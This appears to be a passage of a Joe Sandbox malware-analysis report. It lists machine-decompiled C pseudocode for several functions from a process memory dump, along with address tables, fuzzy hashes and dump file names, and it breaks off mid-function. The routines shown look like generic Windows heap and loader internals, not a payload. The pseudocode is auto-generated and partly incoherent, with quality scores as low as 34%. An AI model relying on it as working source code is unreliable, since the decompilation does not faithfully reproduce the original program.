Opcode ID: 9a45fa132ce3c429773bea3ac330201d6cd882eecf7d7e0233d115f878b1b8c7
Instruction ID: 7f2465ab0055b927c0845903771111e5eae2234698942032717d631d14f5602b
Opcode Fuzzy Hash: 9a45fa132ce3c429773bea3ac330201d6cd882eecf7d7e0233d115f878b1b8c7
Instruction Fuzzy Hash: 4A419071504301AFD761DF28C845BABBBE9FF88754F008A2AF998C7291D774E904DB92

Uniqueness

Uniqueness Score: -1.00%

Function 04CB4779 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04CB4779(signed int __eax, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v0;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t67;
				signed int _t69;
				void* _t73;
				intOrPtr _t74;
				signed int _t76;
				signed int _t79;
				void* _t80;
				intOrPtr* _t84;
				signed int _t88;
				intOrPtr* _t93;
				intOrPtr _t96;
				signed int _t98;
				intOrPtr* _t100;
				void* _t102;

				_t88 = __edx;
				_t55 = __eax;
				_push(_t73);
				_t100 = __edx;
				if((_a4 & 0x00000001) == 0) {
					L17:
					if((_a4 & 0x00000002) != 0) {
						_t93 = _t100 + 8;
						_t74 = 8;
						do {
							__eflags =  *_t93;
							if( *_t93 != 0) {
								E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t93);
							}
							_t93 = _t93 + 4;
							_t74 = _t74 - 1;
							__eflags = _t74;
						} while (_t74 != 0);
						_t55 = E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t74, _t100);
					}
					return _t55;
				} else {
					_t79 =  *0x4da66fc; // 0x4
					_v12 = _t79;
					if(_t79 >= 1) {
						_t98 = 0x11;
						do {
							asm("bsr eax, edi");
							_t88 = _t98;
							asm("btc edx, eax");
							_v20 = _t88;
							_t55 =  *(_t100 + _t55 * 4 - 8);
							_v16 = _t55;
							if(_t55 != 0) {
								_t55 = _t55 + _t88 * 4 + 4;
								if(_t55 != 0 &&  *_t55 != 0) {
									asm("bsr eax, edi");
									_t85 = _t98;
									asm("btc ecx, eax");
									_t67 =  *((intOrPtr*)(0x4da66c4 + _t55 * 4));
									if(_t67 == 0) {
										_t73 = 0;
									} else {
										_t73 = 4 + _t85 * 8 + _t67;
									}
									L04CB53C0(_t73);
									_t69 =  *((intOrPtr*)(_t73 + 4));
									_v12 = _t69;
									if(_t69 != 0 && _t69 != 0xffffffff) {
										_t88 = _v16;
										_t85 =  *(_t88 + 4 + _v20 * 4);
										if(_t85 != 0) {
											 *0x4da91e0(_t85);
											_v8();
											_t72 = _v24;
											 *(_v20 + 4 + _t72 * 4) =  *(_v20 + 4 + _v24 * 4) & 0x00000000;
										}
									}
									_t55 = E04CB52F0(_t85, _t73);
									_t79 = _v16;
								}
							}
							_t98 = _t98 + 1;
							_t79 = _t79 - 1;
							_v12 = _t79;
						} while (_t79 != 0);
					}
					L04CC2330(_t55, 0x4da66d0);
					_t60 =  *_t100;
					if( *((intOrPtr*)(_t60 + 4)) != _t100) {
						L24:
						_t80 = 3;
						asm("int 0x29");
						_push(_t80);
						_push(_t73);
						_push(_t100);
						_push(0x4da66d0);
						_t96 = _v28;
						_t76 = _t88;
						_t102 = _t80;
						__eflags = _t96;
						if(__eflags != 0) {
							_t61 =  *((intOrPtr*)(_t96 + 0x1c));
						} else {
							_t61 = 0;
							__eflags = 0;
						}
						_push(_a12);
						_push(_a8);
						_push(_t61);
						_push(_t96);
						_t62 = E04CB496B(_t76, _t80, _t96, _t102, __eflags);
						__eflags = _t62;
						if(_t62 >= 0) {
							E04CB491F( *((intOrPtr*)(_t102 + 0x5c)), 1);
							 *(_t102 + 0x90) =  *(_t102 + 0x90) & 0x00000000;
							 *(_t102 + 0xdd) = _t76;
							__eflags = _t96;
							if(_t96 != 0) {
								 *((intOrPtr*)(_t102 + 0x10)) =  *((intOrPtr*)(_t96 + 0x18));
							}
							__eflags =  *((intOrPtr*)(_t102 + 8));
							if(__eflags != 0) {
								E04CE73B3(_t76, _t102, _t96, _t102, __eflags);
							}
							_t62 = 0;
							__eflags = 0;
						}
						return _t62;
					} else {
						_t84 =  *((intOrPtr*)(_t100 + 4));
						if( *_t84 != _t100) {
							goto L24;
						} else {
							 *_t84 = _t60;
							 *((intOrPtr*)(_t60 + 4)) = _t84;
							_t55 = E04CC24D0(0x4da66d0);
							goto L17;
						}
					}
				}
			}

0x04cb4779
0x04cb4779
0x04cb4788
0x04cb478b
0x04cb478d
0x04cb486a
0x04cb486e
0x04cb487b
0x04cb487e
0x04cb487f
0x04cb487f
0x04cb4882
0x04cb48ab
0x04cb48ab
0x04cb4884
0x04cb4887
0x04cb4887
0x04cb4887
0x04cb4897
0x04cb4897
0x04cb4876
0x04cb4793
0x04cb4793
0x04cb4799
0x04cb47a0
0x04cb47a8
0x04cb47a9
0x04cb47a9
0x04cb47ac
0x04cb47ae
0x04cb47b1
0x04cb47b5
0x04cb47b9
0x04cb47bf
0x04cb47c4
0x04cb47c7
0x04cb47ce
0x04cb47d1
0x04cb47d3
0x04cb47d6
0x04cb47df
0x04d10144
0x04cb47e5
0x04cb47ec
0x04cb47ec
0x04cb47ef
0x04cb47f4
0x04cb47f7
0x04cb47fd
0x04cb4808
0x04cb480c
0x04cb4812
0x04cb4817
0x04cb481d
0x04cb4821
0x04cb4829
0x04cb4829
0x04cb4812
0x04cb482f
0x04cb4834
0x04cb4834
0x04cb47c7
0x04cb4838
0x04cb4839
0x04cb483c
0x04cb483c
0x04cb47a9
0x04cb484c
0x04cb4851
0x04cb4856
0x04cb48b2
0x04cb48b4
0x04cb48b5
0x04cb48bc
0x04cb48bd
0x04cb48be
0x04cb48bf
0x04cb48c0
0x04cb48c3
0x04cb48c5
0x04cb48c7
0x04cb48c9
0x04cb491a
0x04cb48cb
0x04cb48cb
0x04cb48cb
0x04cb48cb
0x04cb48cd
0x04cb48d3
0x04cb48d6
0x04cb48d7
0x04cb48d8
0x04cb48dd
0x04cb48df
0x04cb48e7
0x04cb48ec
0x04cb48f3
0x04cb48f9
0x04cb48fb
0x04cb4900
0x04cb4900
0x04cb4903
0x04cb4907
0x04cb490b
0x04cb490b
0x04cb4910
0x04cb4910
0x04cb4910
0x04cb4917
0x04cb4858
0x04cb4858
0x04cb485d
0x00000000
0x04cb485f
0x04cb485f
0x04cb4862
0x04cb4865
0x00000000
0x04cb4865
0x04cb485d
0x04cb4856

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4a7bc93afc4f1732b37a3ef060e52c411b87f73aea55cf128c93ac7217fb15
Instruction ID: 312091b6d9694b157a12d31bd57e5c73e78b9ed02a1837219d08e60bf8f9c5fb
Opcode Fuzzy Hash: 2b4a7bc93afc4f1732b37a3ef060e52c411b87f73aea55cf128c93ac7217fb15
Instruction Fuzzy Hash: 2941E3706083419BD729DF28D894B6AB7EBEF80314F08446DE9C1C72A2DB32F951CAD5

Uniqueness

Uniqueness Score: -1.00%

Function 04D30227 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04D30227(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				signed short* _v592;
				signed short* _v596;
				intOrPtr _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t34;
				void* _t35;
				intOrPtr _t38;
				void* _t57;
				void* _t58;
				signed short* _t60;
				signed char* _t61;
				char* _t71;
				void* _t72;
				void* _t74;
				void* _t75;
				signed int _t78;
				signed int _t80;

				_t68 = __edx;
				_t80 = (_t78 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4dab370 ^ _t80;
				_t34 = _a16;
				_v606 = __ecx;
				_t74 = 0;
				_t60 = _a12;
				_v600 = __edx;
				_v596 = _t60;
				_v592 = _t34;
				_t71 =  &_v588;
				if(_t60 != 0) {
					_t74 = ( *_t60 & 0x0000ffff) + 2;
					if(_t34 != 0) {
						_t74 = _t74 + ( *_t34 & 0x0000ffff) + 2;
					}
				}
				_t9 = _t74 + 0x2a; // 0x28
				_t57 = _t9;
				if(_t74 <= 0x214) {
					L5:
					_t35 = 0x240;
					if(_t57 > 0x240) {
						_t35 = _t57;
					}
					E04CF8F40(_t71, 0, _t35);
					_t80 = _t80 + 0xc;
					 *((short*)(_t71 + 6)) = _v606;
					_t38 = _v600;
					if(_t38 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t71 + 0x20)) = _t38;
						 *((char*)(_t71 + 0x28)) = _a4;
						 *((intOrPtr*)(_t71 + 0x24)) = _t68;
						 *((char*)(_t71 + 0x29)) = _a8;
						if(_t74 != 0) {
							_t68 = _t71 + 0x2a;
							E04D2FD65(_v596, _t71 + 0x2a, _t74,  &_v604);
							_t67 = _v600;
							if(_v600 != 0) {
								_t68 = _v604 + 0x2a + _t71;
								E04D2FD65(_t67, _v604 + 0x2a + _t71, _t74 - _v604,  &_v604);
							}
						}
					}
					if(E04CC3C40() == 0) {
						_t61 = 0x7ffe0384;
					} else {
						_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t71);
					_t28 = _t57 - 0x20; // 0xa
					_push(0x402);
					_push( *_t61 & 0x000000ff);
					E04CF2F90();
					_t43 =  &_v604;
					if( &_v604 != _t71) {
						_t43 = E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t71);
					}
					L16:
					_pop(_t72);
					_pop(_t75);
					_pop(_t58);
					return E04CF4B50(_t43, _t58, _v8 ^ _t80, _t68, _t72, _t75);
				}
				_t71 = E04CC5D90(_t60,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
				if(_t71 == 0) {
					goto L16;
				}
				goto L5;
			}

0x04d30227
0x04d3022f
0x04d3023c
0x04d30243
0x04d30248
0x04d3024d
0x04d3024f
0x04d30252
0x04d30256
0x04d3025a
0x04d3025f
0x04d30265
0x04d3026a
0x04d3026f
0x04d30277
0x04d30277
0x04d3026f
0x04d30279
0x04d30279
0x04d30282
0x04d3029f
0x04d3029f
0x04d302a6
0x04d302a8
0x04d302a8
0x04d302ae
0x04d302b8
0x04d302bb
0x04d302bf
0x04d302c6
0x04d302c8
0x04d302c9
0x04d302cf
0x04d302d5
0x04d302d8
0x04d302dd
0x04d302e8
0x04d302ec
0x04d302f1
0x04d302f7
0x04d30308
0x04d3030a
0x04d3030a
0x04d302f7
0x04d302dd
0x04d30316
0x04d30329
0x04d30318
0x04d30321
0x04d30321
0x04d3032e
0x04d3032f
0x04d30336
0x04d3033b
0x04d3033c
0x04d30341
0x04d30347
0x04d30355
0x04d30355
0x04d3035a
0x04d30361
0x04d30362
0x04d30363
0x04d3036e
0x04d3036e
0x04d30295
0x04d30299
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3251ac77d99668c54824669e692ae45c18481e8da38fa33f92727f446ca7704d
Instruction ID: 2d16ecbc3d67c6247486c38b455a7f129070467d4b16c489c6fc5d81d4e9c96a
Opcode Fuzzy Hash: 3251ac77d99668c54824669e692ae45c18481e8da38fa33f92727f446ca7704d
Instruction Fuzzy Hash: 5A41CE726046419FD721DF68D880B6AB3E9FF88700F044A2DF899CB694E730F914C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 04CB6E00 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04CB6E00(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* __ebx;
				void* _t39;
				intOrPtr* _t44;
				char* _t45;
				intOrPtr* _t53;
				char* _t54;
				intOrPtr _t63;
				intOrPtr _t82;
				intOrPtr _t85;

				_push(__ecx);
				_t63 = _a4;
				_t82 = _a8;
				_t85 =  *((intOrPtr*)(_t82 + 0x88));
				if(_t85 != 0) {
					_t39 = E04CD2120(_t63, __ecx, 0, _t85);
					if(_t39 >= 0) {
						 *(_t63 + 0x50) =  *(_t63 + 0x50) | 0x00000100;
						 *((intOrPtr*)(_t63 + 0x64)) = _t85;
						goto L1;
					}
				} else {
					L1:
					_t4 = _t82 + 0x30; // 0x40
					asm("lock inc dword [esi]");
					E04CB71C9(_t82);
					_t5 = _t82 + 0x50; // 0x60
					E04CDDB40(_t5, 1, 0);
					E04CB7007(_t63, _t4);
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L2;
						} else {
							_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							goto L3;
						}
						goto L10;
					} else {
						L2:
						_t45 = 0x7ffe0386;
					}
					L3:
					if( *_t45 != 0) {
						E04D84C59( *((intOrPtr*)(_t82 + 0x8c)), _t82,  *((intOrPtr*)(_t82 + 0x60)),  *((intOrPtr*)(_t82 + 0x64)),  *((intOrPtr*)(_t82 + 0x6c)));
					}
					E04CB6F4C( &_v8,  *((intOrPtr*)(_t82 + 0x60)),  *((intOrPtr*)(_t82 + 0x64)),  *((intOrPtr*)(_t82 + 0x6c)));
					 *((intOrPtr*)(_t63 + 0x30)) =  *((intOrPtr*)(_t82 + 0x60));
					 *((intOrPtr*)(_t63 + 0x34)) =  *((intOrPtr*)(_t82 + 0x64));
					if(( *(_t82 + 0xb4) & 0x00000001) == 0) {
						 *0x4da91e0(_t63,  *((intOrPtr*)(_t82 + 0x64)), _t82);
						 *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x60))))();
					} else {
						 *((intOrPtr*)(_t63 + 0x4c)) = _t82;
						 *0x4da91e0(_t63,  *((intOrPtr*)(_t82 + 0x64)), _t82, _a12);
						 *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x60))))();
					}
					_t53 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t53 != 0) {
						if( *_t53 == 0) {
							goto L7;
						} else {
							_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							goto L8;
						}
						L20:
					} else {
						L7:
						_t54 = 0x7ffe0386;
					}
					L8:
					if( *_t54 != 0) {
						E04D84CD2( *((intOrPtr*)(_t82 + 0x8c)), _t82,  *((intOrPtr*)(_t82 + 0x60)),  *((intOrPtr*)(_t82 + 0x64)),  *((intOrPtr*)(_t82 + 0x6c)));
					}
					_t39 = E04CB6ECF(_v8);
				}
				L10:
				return _t39;
				goto L20;
			}

0x04cb6e05
0x04cb6e07
0x04cb6e0c
0x04cb6e0f
0x04cb6e17
0x04d11490
0x04d11497
0x04d1149d
0x04d114a4
0x00000000
0x04d114a4
0x04cb6e1d
0x04cb6e1d
0x04cb6e1d
0x04cb6e20
0x04cb6e25
0x04cb6e2c
0x04cb6e32
0x04cb6e3b
0x04cb6e46
0x04cb6e4b
0x04d114af
0x00000000
0x04d114b5
0x04d114be
0x00000000
0x04d114be
0x00000000
0x04cb6e51
0x04cb6e51
0x04cb6e51
0x04cb6e51
0x04cb6e56
0x04cb6e59
0x04d114d9
0x04d114d9
0x04cb6e6b
0x04cb6e73
0x04cb6e79
0x04cb6e83
0x04d114ed
0x04d114f3
0x04cb6e89
0x04cb6e8c
0x04cb6e99
0x04cb6e9f
0x04cb6e9f
0x04cb6ea7
0x04cb6eac
0x04d114fd
0x00000000
0x04d11503
0x04d1150c
0x00000000
0x04d1150c
0x00000000
0x04cb6eb2
0x04cb6eb2
0x04cb6eb2
0x04cb6eb2
0x04cb6eb7
0x04cb6eba
0x04d11527
0x04d11527
0x04cb6ec3
0x04cb6ec3
0x04cb6ec8
0x04cb6ecc
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 012d41a19346c7df4bd43e77a55b14681abf8c1f008087eb08c0b1a5e64d0684
Instruction ID: cebf419d35e136ee0b4d009ddb882a5a870b61742696aa64e07e8f90ebd259bf
Opcode Fuzzy Hash: 012d41a19346c7df4bd43e77a55b14681abf8c1f008087eb08c0b1a5e64d0684
Instruction Fuzzy Hash: 1F41A935700A46FFDB169F65CC84BAABBA6FF88704F044055E94287661DB34F820DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 04CC01F1 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E04CC01F1(void* __ecx, signed int __edx, intOrPtr _a4, char _a8) {
				char _v5;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				signed int _t39;
				void* _t42;
				short _t49;
				intOrPtr* _t52;
				char* _t53;
				void* _t59;
				signed int _t68;
				void* _t70;

				_t59 = __ecx;
				_v5 = __edx;
				_t61 = __edx;
				_t68 = 1 << __edx;
				if(1 > 0x78000) {
					_t68 = 0x78000;
				}
				_t69 = _t68;
				_v12 = _t68;
				if(_a8 != 0) {
					_t13 = _t68 + 0x2000; // 0x2001
					_t69 = _t13;
					_v12 = _t13;
				}
				E04CBFED0( *((intOrPtr*)(_t59 + 0xc8)));
				_t70 = E04CC5D90(_t61, _t59, 0x800001, _t69);
				if(_t70 == 0) {
					_push( *((intOrPtr*)(_t59 + 0xc8)));
					E04CBE740(_t61);
					L8:
					return _t70;
				}
				if(_a8 != 0) {
					_t15 = _t70 + 0xfff; // 0xfff
					_t39 = _t15 + _t68 & 0xfffff000;
					_v20 = _t39;
					_v12 = _t39 - _t70;
					_t42 = E04CC2710(_t59, 0x800001, _t70, _t39 - _t70 + 0x1000);
					_push( *((intOrPtr*)(_t59 + 0xc8)));
					_t70 = _t42;
					E04CBE740(_t61);
					_v16 = 0x1000;
					_push( &_v24);
					_push(1);
					_push( &_v16);
					_push( &_v20);
					_push(0xffffffff);
					E04CF2EB0();
					_t62 = _v12;
					_t49 = _v12 - _t68;
					 *((char*)(_t70 + 9)) = 1;
				} else {
					_push( *((intOrPtr*)(_t59 + 0xc8)));
					E04CBE740(_t61);
					_t62 = _v12;
					_t49 = 0;
					 *((char*)(_t70 + 9)) = 0;
				}
				 *((short*)(_t70 + 0xa)) = _t49;
				 *((char*)(_t70 + 8)) = _v5;
				_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t52 != 0) {
					if( *_t52 == 0) {
						goto L6;
					}
					_t53 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					goto L7;
				} else {
					L6:
					_t53 = 0x7ffe0380;
					L7:
					if( *_t53 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							E04D6F478(_t59, _t59, _t70, _t62, _a4);
						}
					}
					goto L8;
				}
			}

0x04cc0200
0x04cc0202
0x04cc0206
0x04cc0208
0x04cc0211
0x04d14a81
0x04d14a81
0x04cc021b
0x04cc021d
0x04cc0220
0x04cc028e
0x04cc028e
0x04cc0294
0x04cc0294
0x04cc0228
0x04cc0239
0x04cc023d
0x04d14a88
0x04d14a8e
0x04cc0286
0x04cc028b
0x04cc028b
0x04cc0247
0x04cc0299
0x04cc02a1
0x04cc02a6
0x04cc02ab
0x04cc02bb
0x04cc02c0
0x04cc02c6
0x04cc02c8
0x04cc02d0
0x04cc02d7
0x04cc02d8
0x04cc02dd
0x04cc02e1
0x04cc02e2
0x04cc02e4
0x04cc02e9
0x04cc02ee
0x04cc02f0
0x04cc0249
0x04cc0249
0x04cc024f
0x04cc0254
0x04cc0257
0x04cc0259
0x04cc0259
0x04cc025c
0x04cc0263
0x04cc026c
0x04cc0271
0x04d14a9b
0x00000000
0x00000000
0x04d14aaa
0x00000000
0x04cc0277
0x04cc0277
0x04cc0277
0x04cc027c
0x04cc027f
0x04d14ac1
0x04d14acf
0x04d14acf
0x04d14ac1
0x00000000
0x04cc027f

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a431f2ccfb141296752c9e67fc823e92224fa0994025ddf01f712cdea7409b7d
Instruction ID: 12510e0a5a3f0e2c992210a165aea18986b80315ea05790b7081de25a62a04a6
Opcode Fuzzy Hash: a431f2ccfb141296752c9e67fc823e92224fa0994025ddf01f712cdea7409b7d
Instruction Fuzzy Hash: 03314A31A00644EFDB118FA9CC44BEABBFAEF04354F0841AAE855D7352D674B944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CAEDFA Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E04CAEDFA(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t56;
				unsigned int _t58;
				char _t63;
				unsigned int _t75;
				signed int _t80;
				intOrPtr _t83;
				void* _t85;

				_push(0x18);
				_push(0x4d8bb78);
				E04D07BE4(__ebx, __edi, __esi);
				_t83 = __ecx;
				 *((intOrPtr*)(_t85 - 0x28)) = __ecx;
				 *((char*)(_t85 - 0x1a)) = 0;
				 *((char*)(_t85 - 0x19)) = 0;
				 *((intOrPtr*)(_t85 - 0x20)) = 0;
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if(( *(__ecx + 0x40) & 0x75010f61) != 0 || ( *(__ecx + 0x40) & 0x00000002) == 0 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					_t48 = 0;
					_t63 = 1;
				} else {
					_t63 = 1;
					_t48 = 1;
				}
				if(_t48 == 0) {
					_t80 = 0xc000000d;
					goto L18;
				} else {
					E04CBFED0( *((intOrPtr*)(_t83 + 0xc8)));
					 *((char*)(_t85 - 0x19)) = _t63;
					if( *((char*)(_t83 + 0xea)) == 2) {
						_t48 =  *(_t83 + 0xe4);
					} else {
						_t48 = 0;
					}
					if(_t48 != 0) {
						_t80 = 0;
						goto L18;
					} else {
						if( *((intOrPtr*)(_t83 + 0xe8)) != 0) {
							_t80 = 0xc000001e;
							L18:
							 *((intOrPtr*)(_t85 - 0x20)) = _t80;
							L19:
							_t64 = 0xffff;
							L14:
							 *((intOrPtr*)(_t85 - 4)) = 0xfffffffe;
							E04CAEF5F(_t48, _t64, _t83);
							 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0x10));
							return _t80;
						}
						 *((short*)(_t83 + 0xe8)) = _t63;
						 *((char*)(_t85 - 0x1a)) = _t63;
						_t75 =  *0x4da3928; // 0x4000
						_t72 = _t83;
						_t80 = E04CB1C50(_t83, (_t75 >> 3) + 2);
						 *((intOrPtr*)(_t85 - 0x20)) = _t80;
						if(_t80 < 0) {
							goto L19;
						}
						E04CB12F3(_t83,  *((intOrPtr*)(_t83 + 0xb4)), _t72);
						 *(_t83 + 0xe4) =  *(_t83 + 0xe4) & 0x00000000;
						 *((char*)(_t83 + 0xea)) = 0;
						_push( *((intOrPtr*)(_t83 + 0xc8)));
						E04CBE740(_t83);
						 *((char*)(_t85 - 0x19)) = 0;
						_t74 = _t83;
						 *(_t85 - 0x24) = E04CAEF79(_t83);
						E04CBFED0( *((intOrPtr*)(_t83 + 0xc8)));
						 *((char*)(_t85 - 0x19)) = _t63;
						_t56 =  *(_t85 - 0x24);
						if(_t56 == 0) {
							_t80 = 0xc0000017;
							 *((intOrPtr*)(_t85 - 0x20)) = 0xc0000017;
						} else {
							 *(_t83 + 0xe4) = _t56;
							 *((short*)(_t83 + 0xea)) = 0x202;
							if((E04CB0670() & 0x00010000) == 0) {
								_t58 =  *0x4da3928; // 0x4000
								 *(_t83 + 0x6c) = _t58 >> 3;
							}
						}
						_t64 = 0xffff;
						 *((intOrPtr*)(_t83 + 0xe8)) =  *((intOrPtr*)(_t83 + 0xe8)) + 0xffff;
						 *((char*)(_t85 - 0x1a)) = 0;
						 *((char*)(_t85 - 0x19)) = 0;
						_push( *((intOrPtr*)(_t83 + 0xc8)));
						_t48 = E04CBE740(_t74);
						goto L14;
					}
				}
			}

0x04caedfa
0x04caedfc
0x04caee01
0x04caee06
0x04caee08
0x04caee0d
0x04caee10
0x04caee13
0x04caee16
0x04caee20
0x04d0db26
0x04d0db2a
0x04caee43
0x04caee45
0x04caee46
0x04caee46
0x04caee4a
0x04d0db30
0x00000000
0x04caee50
0x04caee56
0x04caee5b
0x04caee67
0x04d0db49
0x04caee6d
0x04caee6d
0x04caee6d
0x04caee71
0x04d0db54
0x00000000
0x04caee77
0x04caee7e
0x04d0db37
0x04d0db3c
0x04d0db3c
0x04d0db3f
0x04d0db3f
0x04caef41
0x04caef41
0x04caef48
0x04caef52
0x04caef5e
0x04caef5e
0x04caee84
0x04caee8b
0x04caee8e
0x04caee9a
0x04caeea1
0x04caeea3
0x04caeea8
0x00000000
0x00000000
0x04caeeb7
0x04caeebc
0x04caeec3
0x04caeeca
0x04caeed0
0x04caeed5
0x04caeed9
0x04caeee0
0x04caeee9
0x04caeeee
0x04caeef1
0x04caeef6
0x04d0db58
0x04d0db5d
0x04caeefc
0x04caeefc
0x04caef02
0x04caef15
0x04caef17
0x04caef1f
0x04caef1f
0x04caef15
0x04caef22
0x04caef27
0x04caef2e
0x04caef32
0x04caef36
0x04caef3c
0x00000000
0x04caef3c
0x04caee71

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 495c750bc1212fa0aa598326fd59bcdc4f8f0ec51e918f30efd8eb41ee249a74
Instruction ID: 078ebf335a87bddff6e9050b8eb9656053e80b0de0306b456f64f82d0516dc5d
Opcode Fuzzy Hash: 495c750bc1212fa0aa598326fd59bcdc4f8f0ec51e918f30efd8eb41ee249a74
Instruction Fuzzy Hash: 1E41B131A047858FEB61DFA8C8103EEBBB3BF55308F18852ED49AA7280D7347905D799

Uniqueness

Uniqueness Score: -1.00%

Function 04CD66E0 Relevance: .1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04CD66E0(void* __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _t45;
				intOrPtr* _t51;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr* _t56;
				void* _t71;
				intOrPtr* _t74;

				_t68 = __edx;
				_t58 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t56 = _a16;
				if(_t56 != 0) {
					 *_t56 = 0;
					_v8 = 0;
					E04CD2DB0(_a4 | 0x00000030,  &_v12, 0,  &_v8);
					_t74 = E04CC5D90(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x10);
					if(_t74 != 0) {
						if( *((intOrPtr*)( *[fs:0x18] + 0xfb8)) == 0) {
							L8:
							if( *((intOrPtr*)( *[fs:0x18] + 0xfc0)) == 0) {
								L11:
								if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) == 0) {
									L14:
									 *((intOrPtr*)(_t74 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									_t71 = E04CD64E0(_t68, _a4, _a8, _a12);
									if(_t71 >= 0) {
										 *_t56 = _t74;
										_t74 = 0;
									}
									L16:
									if(_t74 != 0) {
										E04CD332D( *_t74);
										E04CEBD71(E04CD332D( *((intOrPtr*)(_t74 + 4))),  *((intOrPtr*)(_t74 + 8)), _t68);
										E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t74);
									}
									_t45 = _t71;
									L19:
									L2:
									return _t45;
								}
								_t51 = E04D53EFC( *((intOrPtr*)( *[fs:0x18] + 0xfbc)));
								 *((intOrPtr*)(_t74 + 8)) = _t51;
								if(_t51 == 0) {
									L20:
									_t71 = 0xc0000017;
									goto L16;
								}
